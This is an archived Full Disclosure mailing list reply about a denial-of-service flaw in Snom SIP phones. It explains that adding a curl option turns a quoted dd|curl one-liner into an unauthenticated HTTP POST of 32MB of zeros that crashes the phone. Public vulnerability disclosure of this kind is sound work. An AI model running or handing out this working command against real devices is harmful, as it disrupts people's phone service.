Full Disclosure mailing list archives

Re: Snom SIP phones denial of service through HTTP

From: "kapejod () googlemail com" <kapejod () gmail com>
Date: Tue, 13 Jan 2015 09:52:19 +0100

The latest version is 8.7.3.25.9, there is no 8.7.4.X, yet.

And yes, you missed something, (without the quotes)  " --data-binary @-"
This turns it into a HTTP POST request and uses the input from stdin.
Otherwise you just do a regular HTTP GET which gets blocked because it's
not authenticated.


On Mon, Jan 12, 2015 at 10:20 PM, Martin Schuhmacher <broetchen25 () gmx net>
wrote:

Hi

i just did

$ dd if=/dev/zero bs=1M count=32 | curl http://$IP/
Response: Unauthorized request

did i miss anything?

Firmware: snom360-SIP 8.7.4.8
not downloadable any more for some reason?

Yours
Martin

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Current thread:

Snom SIP phones denial of service through HTTP kapejod () googlemail com (Jan 12)
- Re: Snom SIP phones denial of service through HTTP Martin Schuhmacher (Jan 12)
  - Re: Snom SIP phones denial of service through HTTP Max Mühlbronner (Jan 13)
  - Re: Snom SIP phones denial of service through HTTP kapejod () googlemail com (Jan 13)
    - Re: Snom SIP phones denial of service through HTTP Martin Schuhmacher (Jan 13)